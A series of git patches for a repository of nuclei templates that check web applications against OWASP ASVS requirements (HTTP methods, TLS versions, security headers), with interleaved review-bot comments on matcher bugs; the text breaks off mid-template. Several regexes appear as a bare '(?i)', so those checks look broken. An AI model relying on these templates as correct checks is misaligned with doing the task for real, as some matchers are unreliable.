From 0e14a4b883379282777727f5fc8a3a08aca81198 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 21:04:56 +0330 Subject: [PATCH 025/129] Update 13.2.1.yaml Fix lint issues. Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 8f1cc9e..94d569e 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -35,7 +35,7 @@ http: - type: regex part: header regex: - - "(PUT|DELETE|TRACE|PATCH|CONNECT)" + - "(PUT|DELETE|TRACE|PATCH|CONNECT)" - raw: - | @@ -70,7 +70,7 @@ http: - 501 - type: dsl dsl: - - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" + - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" - method: DELETE path: @@ -93,8 +93,8 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - method: TRACE path: - "{{BaseURL}}" @@ -116,7 +116,7 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - type: regex part: body regex: @@ -144,7 +144,7 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - method: CONNECT path: @@ -167,5 +167,4 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" From 68801e06278d4c3cba06032d1d976919167e216b Mon Sep 17 00:00:00 2001 From: Reza Saeedi Date: Fri, 4 Aug 2023 21:06:13 +0330 Subject: [PATCH 026/129] Create 9-1-3.yaml 
Signed-off-by: Reza Saeedi --- templates/9-3-1.yaml | 50 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 templates/9-3-1.yaml diff --git a/templates/9-3-1.yaml b/templates/9-3-1.yaml new file mode 100644 index 0000000..cbba2d7 --- /dev/null +++ b/templates/9-3-1.yaml @@ -0,0 +1,50 @@ +id: 9-1-3 + +info: + name: Client Communication Security + author: righettod,forgedhallpass,RezaSaeedi + severity: low + reference: + - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://wiki.mozilla.org/Security/Server_Side_TLS + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html + - https://ssl-config.mozilla.org/#config=intermediate + description: | + Verify that only the latest recommended versions of the TLS protocol are enabled, such as TLS 1.2 and TLS 1.3. The latest version of the TLS protocol should be the preferred option. + remediation: | + Update the web server's TLS configuration to disable TLS 1.1,1.0 and SSLv3. + metadata: + max-request: 4 + shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1 + tags: ssl,ClientCommunicationSecurity,tls,misconfig,9.1.3,asvsV4 + +ssl: + - address: "{{Host}}:{{Port}}" + min_version: ssl30 + max_version: ssl30 + + extractors: + - type: json + name : test + json: + - " .tls_version" + + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: json + name : test + json: + - " .tls_version" + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: json + name : test + json: + - " .tls_version" \ No newline at end of file From 06bf232060870086bbc934a24d579df2f218970a Mon Sep 17 00:00:00 2001 
From: Hamed Salimian Date: Fri, 4 Aug 2023 21:10:37 +0330 Subject: [PATCH 027/129] Update 13.2.1.yaml Fix lint issue. Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 94d569e..5180abd 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -94,7 +94,7 @@ http: negative: true dsl: - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - + - method: TRACE path: - "{{BaseURL}}" From d47b6ffdfd6a2e55d92b3af0c67113f2a0fdcced Mon Sep 17 00:00:00 2001 From: Reza Saeedi Date: Fri, 4 Aug 2023 22:05:39 +0330 Subject: [PATCH 028/129] Update 9-3-1.yaml Signed-off-by: Reza Saeedi --- templates/9-3-1.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/templates/9-3-1.yaml b/templates/9-3-1.yaml index cbba2d7..fd5bf0e 100644 --- a/templates/9-3-1.yaml +++ b/templates/9-3-1.yaml @@ -25,7 +25,6 @@ ssl: extractors: - type: json - name : test json: - " .tls_version" @@ -35,7 +34,6 @@ ssl: extractors: - type: json - name : test json: - " .tls_version" @@ -45,6 +43,5 @@ ssl: extractors: - type: json - name : test json: - - " .tls_version" \ No newline at end of file + - " .tls_version" From 3bc924ebaca1406f14e880815528f4b78ad0ac22 Mon Sep 17 00:00:00 2001 From: Reza Saeedi Date: Fri, 4 Aug 2023 22:07:29 +0330 Subject: [PATCH 029/129] Rename 9-3-1.yaml to 9.1.3.yaml Signed-off-by: Reza Saeedi --- templates/{9-3-1.yaml => 9.1.3.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename templates/{9-3-1.yaml => 9.1.3.yaml} (100%) diff --git a/templates/9-3-1.yaml b/templates/9.1.3.yaml similarity index 100% rename from templates/9-3-1.yaml rename to templates/9.1.3.yaml From 91d0fca07643583a30151aa5aa5bfb82b4859e0b Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 10:55:27 +0330 Subject: [PATCH 030/129] Update 13.2.1.yaml Edit `id` and `reference` 
Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 5180abd..2657a2f 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -1,4 +1,4 @@ -id: asvs_13_2_1 +id: ASVS-4.0.3-V13.2.1 info: name: ASVS 13.2.1 Check @@ -7,7 +7,7 @@ info: classification: cwe-id: CWE-650 reference: - - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods - https://nmap.org/nsedoc/scripts/http-methods.html tags: asvs,13.2.1 description: | From aa7c5aec08a18c6c412370db7ae3b14a91717fb2 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:05:41 +0330 Subject: [PATCH 031/129] Create 14.4.1.yaml Create ASVS-4.0.3-V14.4.1 template. Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 templates/14.4.1.yaml diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml new file mode 100644 index 0000000..98ca000 --- /dev/null +++ b/templates/14.4.1.yaml 
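Review bot: the new `id: ASVS-4.0.3-V13.2.1` contains periods, which nuclei's template-id validation (alphanumerics, hyphens and underscores only) is likely to reject once the validation workflow runs; a dashed form such as `ASVS-4-0-3-V13-2-1` avoids that. Pinning the WSTG reference to `v42` instead of `stable` is a good change, since the stable path moves with each release.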
@@ -0,0 +1,30 @@ +id: ASVS-4.0.3-V14.4.1 + +info: + name: ASVS 14.4.1 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-173 + reference: + - https://github.com/BlazingWind/OWASP-ASVS-4.0-testing-guide/blob/main/14-Configuration/14-4-1-Charset.md + tags: asvs,14.4.1 + description: | + Verify that every HTTP response contains a Content-Type header. Also specify a safe character set (e.g., UTF-8, ISO-8859-1) if the content types are text/*, /+xml and application/xml. Content must match with the provided Content-Type header. + +http: + - raw: + - | + GET {{Path}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: */* + + extractors: + - type: kval + name: "Content-Type" + part: header + kval: + - Content_Type From ce1c075ebbcf0170c8075da268095031abd00663 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:27:04 +0330 Subject: [PATCH 032/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 0b29477..430cc02 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,3 @@ jobs: run: | cp -r ${{ github.workspace }} $HOME nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w ./workflows -allow-local-file-access From aaac3de74889709de0fdfdc8adfa15c1c8fcd3b4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:36:25 +0330 Subject: [PATCH 033/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
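Review bot: the new 14.4.1 template has only a `kval` extractor for `Content_Type` and no matcher, so nuclei reports when the header is present and stays silent when it is missing, the inverse of "verify that every HTTP response contains a Content-Type header"; add a negative matcher on the header, for example a `dsl` of `!contains(tolower(header), "content-type:")`. The `Origin: {{BaseURL}}` line serves no purpose on a plain GET and can change the response on CORS-aware servers; drop it so the probe sees the default response. In the following workflow hunk, removing the `-w ./workflows` validation line is fine as long as the repository has no `workflows` directory.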
diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 430cc02..e31adb3 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -26,4 +26,4 @@ jobs: - name: Template Validation run: | cp -r ${{ github.workspace }} $HOME - nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -allow-local-file-access -t $HOME/templates From f713df2d772c9748345b67efccce85aa242889c9 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:43:12 +0330 Subject: [PATCH 034/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index e31adb3..ced5499 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,5 +25,4 @@ jobs: - name: Template Validation run: | - cp -r ${{ github.workspace }} $HOME - nuclei -duc -validate -allow-local-file-access -t $HOME/templates + nuclei -duc -validate -allow-local-file-access -t ${{ github.workspace }}/templates From 6eb6d61b19873c293c9d82659590cc8e86a8985a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:50:56 +0330 Subject: [PATCH 035/129] Update 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 2657a2f..5e3f4b0 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -1,4 +1,4 @@ -id: ASVS-4.0.3-V13.2.1 +id: ASVS-4-0-3-V13-2-1 info: name: ASVS 13.2.1 Check From ab09bc83890c57760817423e20b3ad66a3080e38 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:55:04 +0330 Subject: [PATCH 036/129] Update 14.4.1.yaml 
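Review bot: `-t $HOME/templates` in the first hunk points at a directory that does not exist: `cp -r ${{ github.workspace }} $HOME` copies the checkout to `$HOME/<repo-name>`, not to `$HOME/templates`, so the validation step would validate nothing. The next hunk's `-t ${{ github.workspace }}/templates` without the copy is the correct target. The third hunk's switch of the template id to `ASVS-4-0-3-V13-2-1` is consistent with nuclei's id restrictions and should be applied to every template in the repository in one commit rather than file by file.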
Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index 98ca000..aff5c31 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml @@ -1,4 +1,4 @@ -id: ASVS-4.0.3-V14.4.1 +id: ASVS-4-0-3-V14-4-1 info: name: ASVS 14.4.1 Check From 74bbfc1443b466648488dfe63a03fc7092bd6b7d Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 12:01:08 +0330 Subject: [PATCH 037/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index ced5499..2656ccd 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,4 +25,5 @@ jobs: - name: Template Validation run: | - nuclei -duc -validate -allow-local-file-access -t ${{ github.workspace }}/templates + cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates + nuclei -duc -validate -allow-local-file-access From 69b158d46661a862ad5a9878f201f326ccdf4a59 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 16:35:24 +0330 Subject: [PATCH 038/129] Update 14.4.1.yaml Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 42 ++++++++++++++++++++++++++++++++++++++---- 1 file changed, 38 insertions(+), 4 deletions(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index aff5c31..8b042bd 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml 
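Review bot: in the workflow hunk, `/home/runner/nuclei-templates` hardcodes the runner's home directory and relies on nuclei discovering its default template directory instead of being told what to validate; `cp -r ${{ github.workspace }}/templates $HOME/nuclei-templates` plus an explicit `-t $HOME/nuclei-templates` is portable and makes the validated set unambiguous. If the intent of copying into the default directory is to exercise the same loader path as end users, say so in a comment in the workflow so the next person does not "simplify" it back.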
@@ -7,7 +7,7 @@ info: classification: cwe-id: CWE-173 reference: - - https://github.com/BlazingWind/OWASP-ASVS-4.0-testing-guide/blob/main/14-Configuration/14-4-1-Charset.md + - https://github.com/OWASP/ASVS/issues/710 tags: asvs,14.4.1 description: | Verify that every HTTP response contains a Content-Type header. Also specify a safe character set (e.g., UTF-8, ISO-8859-1) if the content types are text/*, /+xml and application/xml. Content must match with the provided Content-Type header. @@ -15,11 +15,10 @@ info: http: - raw: - | - GET {{Path}} HTTP/1.1 + GET {{BaseURL}} HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: */* extractors: @@ -28,3 +27,38 @@ http: part: header kval: - Content_Type + - type: regex + name: "HTML meta charset" + regex: + - (?i) + part: body + - type: regex + name: "XML declaration encoding" + regex: + - (?i)<\?xml\s+version\s*=\s*["'][0-9.]*["']\s+encoding\s*=\s*["'](utf-?8|utf-?16|iso-?8859-?1)["']\s*\?> + part: body + + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + name: "Content-Type header" + negative: true + regex: + - (?i)Content-Type:\s+text/(\w+);\s+charset=(utf-?8|iso-?8859?-1) + - (?i)Content-Type:\s+(application/xml|\+xml);\s+charset=(utf-?8|utf-?16) + part: header + + - type: regex + name: "HTML meta charset" + negative: true + regex: + - (?i) + part: body + + - type: regex + name: "XML declaration encoding" + negative: true + regex: + - (?i)<\?xml\s+version\s*=\s*["'][0-9.]*["']\s+encoding\s*=\s*["'](utf-?8|utf-?16|iso-?8859-?1)["']\s*\?> + part: body From 58103a18ca9dac19d0ab399988008f9614edea01 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 16:40:32 +0330 Subject: [PATCH 039/129] Update 14.4.1.yaml 
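Review bot: in the new `Content-Type header` matcher, `text/(\w+);\s+charset=...` requires whitespace after the semicolon, so a valid `Content-Type: text/html;charset=utf-8` is reported as lacking a charset, and the `(application/xml|\+xml)` alternative can never match a real `application/rss+xml` value because `\+xml` would have to follow `Content-Type:\s+` directly; `;\s*charset=` and `[\w.+-]+/[\w.-]+\+xml` fix both. `iso-?8859?-1` makes the `9` optional rather than the hyphen; the intended pattern is `iso-?8859-?1`. More importantly, with `matchers-condition: and` over three negative matchers, any response whose media type needs no charset (`image/png`, `application/json`, `application/octet-stream`) trips all three and is reported, although the description limits the charset requirement to `text/*` and XML types; gate the charset matchers on the type, or reduce the finding for other types to "header absent". The `HTML meta charset` patterns appear in this hunk as a bare `(?i)`, which matches every body; confirm the committed regex contains the `<meta charset=...>` markup. Swapping the reference to the ASVS issue is fine, but the original testing-guide link was the more actionable one for users.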
Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index 8b042bd..999b3e6 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml @@ -11,7 +11,6 @@ info: tags: asvs,14.4.1 description: | Verify that every HTTP response contains a Content-Type header. Also specify a safe character set (e.g., UTF-8, ISO-8859-1) if the content types are text/*, /+xml and application/xml. Content must match with the provided Content-Type header. - http: - raw: - | @@ -26,7 +25,7 @@ http: name: "Content-Type" part: header kval: - - Content_Type + - Content_Type - type: regex name: "HTML meta charset" regex: From b2b8f1ab6edecd6f41e804421cadf57f5341acce Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 16:42:05 +0330 Subject: [PATCH 040/129] Update 14.4.1.yaml Signed-off-by: Hamed Salimian --- templates/14.4.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.4.1.yaml b/templates/14.4.1.yaml index 999b3e6..6610704 100644 --- a/templates/14.4.1.yaml +++ b/templates/14.4.1.yaml @@ -36,7 +36,7 @@ http: regex: - (?i)<\?xml\s+version\s*=\s*["'][0-9.]*["']\s+encoding\s*=\s*["'](utf-?8|utf-?16|iso-?8859-?1)["']\s*\?> part: body - + matchers-condition: and stop-at-first-match: true matchers: From e139939993cbe0fb88e4acb7cdcce66ce536a49d Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 20 Aug 2023 11:00:35 +0330 Subject: [PATCH 041/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/tab_contributing.md b/tab_contributing.md index 2a82cf5..e5bec91 100644 --- a/tab_contributing.md +++ b/tab_contributing.md 
@@ -15,7 +15,5 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Mohammad Khodaiemehr](https://github.com/m0khd) - [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) -- [Dorna Azhirak](https://github.com/nameddorna) From 0eb82cf1607492140095806e01276736a06e50ac Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 31 Aug 2023 14:03:08 +0330 Subject: [PATCH 042/129] Create 14.4.2.yaml Signed-off-by: Hamed Salimian --- templates/14.4.2.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 templates/14.4.2.yaml diff --git a/templates/14.4.2.yaml b/templates/14.4.2.yaml new file mode 100644 index 0000000..309fecf --- /dev/null +++ b/templates/14.4.2.yaml @@ -0,0 +1,30 @@ +id: ASVS-4-0-3-V14-4-2 + +info: + name: ASVS 14.4.2 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-116 + reference: + - https://github.com/OWASP/ASVS/issues/1009 + - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition + tags: asvs,14.4.2 + description: | + Verify that all API responses contain a Content-Disposition: attachment; filename="api.json" header (or other appropriate filename for the content type). + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + matchers: + - type: dsl + name: '"Content-Disposition: attachment; filename=" header does not exist.' + dsl: + - '!contains(header, "Content-Disposition: attachment; filename=")' + From 7537facac395a1556ef50c6c1d60d9ebbbc1f868 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 31 Aug 2023 14:07:43 +0330 Subject: [PATCH 043/129] Update 14.4.2.yaml 
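Review bot: in the new 14.4.2 template, `!contains(header, "Content-Disposition: attachment; filename=")` is a case- and whitespace-sensitive literal, so a lowercase `content-disposition:` (the form HTTP/2 responses carry), `attachment;filename=` without a space, and the RFC 6266 `filename*=` form all produce a false finding; a regex such as `(?i)content-disposition:\s*attachment;\s*filename\*?=` is safer. The request also targets `{{BaseURL}}`, normally an HTML page, while the requirement is scoped to API responses, so every web root will be reported; gate the matcher on a JSON or XML content type (e.g. `contains(tolower(content_type), "json")`) or document that the template must be run against API paths only.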
Signed-off-by: Hamed Salimian --- templates/14.4.2.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/templates/14.4.2.yaml b/templates/14.4.2.yaml index 309fecf..161a4a5 100644 --- a/templates/14.4.2.yaml +++ b/templates/14.4.2.yaml @@ -12,7 +12,7 @@ info: tags: asvs,14.4.2 description: | Verify that all API responses contain a Content-Disposition: attachment; filename="api.json" header (or other appropriate filename for the content type). - + http: - raw: - | @@ -27,4 +27,3 @@ http: name: '"Content-Disposition: attachment; filename=" header does not exist.' dsl: - '!contains(header, "Content-Disposition: attachment; filename=")' - From 895171402d27c395e27eccdf336b0417eb927351 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Sep 2023 15:07:45 +0330 Subject: [PATCH 044/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 7037f89..091b4a0 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,5 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) From 26a97a2740f7084d9d15e2186ac1c92ba05f6bed Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Sep 2023 15:08:05 +0330 Subject: [PATCH 045/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 1 - 1 file changed, 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index e5bec91..e1a150d 100644 --- a/tab_contributing.md +++ b/tab_contributing.md 
@@ -15,5 +15,4 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) From e6108c62ff15bfa720c2bf3c6d6034c4b908feae Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 13 Sep 2023 08:54:38 +0330 Subject: [PATCH 046/129] Create 14.4.3.yaml Signed-off-by: Hamed Salimian --- templates/14.4.3.yaml | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 templates/14.4.3.yaml diff --git a/templates/14.4.3.yaml b/templates/14.4.3.yaml new file mode 100644 index 0000000..7dd5bfc --- /dev/null +++ b/templates/14.4.3.yaml @@ -0,0 +1,38 @@ +id: ASVS-4-0-3-V14-4-3 + +info: + name: ASVS 14.4.3 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-1021 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html + tags: asvs,14.4.3 + description: | + Verify that a Content Security Policy (CSP) response header is in place that helps mitigate impact for XSS attacks like HTML, DOM, JSON, and JavaScript injection vulnerabilities. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + matchers-condition: and + matchers: + - type: word + name: 'Content Security Policy (CSP) header does not exist.' + part: header + negative: true + words: + - 'Content-Security-Policy:' + - 'Content-Security-Policy-Report-Only:' + - type: regex + name: 'Content Security Policy (CSP) Meta Tag does not exist.' + part: body + negative: true + regex: + - (?i) From 4a4558a8cfc29bebea17e7be64f8ad0e3f0d9206 Mon Sep 17 00:00:00 2001 
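Review bot: in the new 14.4.3 template the `word` matcher on `Content-Security-Policy:` is case-sensitive by default, so a lowercase `content-security-policy:` header is reported as absent; add `case-insensitive: true` or use a `(?i)` regex. Counting `Content-Security-Policy-Report-Only:` as satisfying 14.4.3 overstates the protection, because report-only policies block nothing; report it as a separate, weaker finding rather than letting it silence the main one. The meta-tag regex shows here as a bare `(?i)`, which matches every body, and since it is a negative matcher under `matchers-condition: and` the template would then never fire at all; confirm the committed pattern includes the `<meta http-equiv="Content-Security-Policy" ...>` markup.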
From: Hamed Salimian Date: Wed, 13 Sep 2023 09:00:05 +0330 Subject: [PATCH 047/129] Update 14.4.3.yaml Signed-off-by: Hamed Salimian --- templates/14.4.3.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.4.3.yaml b/templates/14.4.3.yaml index 7dd5bfc..3b7c3c7 100644 --- a/templates/14.4.3.yaml +++ b/templates/14.4.3.yaml @@ -35,4 +35,4 @@ http: part: body negative: true regex: - - (?i) + - (?i) From 4e7e7cf946ad14e04a83ada4e3545839bfdd0bb4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 09:54:44 +0330 Subject: [PATCH 048/129] Create 14.4.4.yaml Signed-off-by: Hamed Salimian --- templates/14.4.4.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 templates/14.4.4.yaml diff --git a/templates/14.4.4.yaml b/templates/14.4.4.yaml new file mode 100644 index 0000000..6e4a257 --- /dev/null +++ b/templates/14.4.4.yaml @@ -0,0 +1,28 @@ +id: ASVS-4-0-3-V14-4-4 + +info: + name: ASVS 14.4.4 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-116 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html + tags: asvs,14.4.4 + description: | + Verify that all responses contain a X-Content-Type-Options: nosniff header. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + matchers: + - type: dsl + name: '"X-Content-Type-Options: nosniff" header does not exist.' + dsl: + - '!contains(header, "X-Content-Type-Options: nosniff")' From c61ed7d8f0d229aae3c7cd95baa54f301a65e495 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 27 Sep 2023 12:08:34 +0330 Subject: [PATCH 049/129] Create 14.4.5.yaml 
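Review bot: the 14.4.3 hunk shows `(?i)` replaced by `(?i)`, so as rendered the change is a no-op; the actual edit to the meta-tag pattern should be visible in the diff, otherwise the commit has no reviewable content. In the new 14.4.4 template, `!contains(header, "X-Content-Type-Options: nosniff")` has the same literal-match problem as 14.4.2: header names are case-insensitive and browsers compare `nosniff` ASCII-case-insensitively, so `x-content-type-options: NOSNIFF` is a valid, effective header that this check reports as missing; `(?i)x-content-type-options:\s*nosniff` in a regex matcher is the robust form. The cited reference is the CSP cheat sheet; the HTTP Headers cheat sheet's `X-Content-Type-Options` section is the applicable one.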
Signed-off-by: Hamed Salimian --- templates/14.4.5.yaml | 44 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 templates/14.4.5.yaml diff --git a/templates/14.4.5.yaml b/templates/14.4.5.yaml new file mode 100644 index 0000000..54e39ff --- /dev/null +++ b/templates/14.4.5.yaml @@ -0,0 +1,44 @@ +id: ASVS-4-0-3-V14-4-5 + +info: + name: ASVS 14.4.5 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-523 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html + tags: asvs,14.4.5 + description: | + Verify that a Strict-Transport-Security header is included on all responses and for all subdomains, such as Strict-Transport-Security: max-age=15724800; includeSubdomains. + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + extractors: + - type: kval + name: "Strict-Transport-Security" + part: header + kval: + - Strict_Transport_Security + + stop-at-first-match: 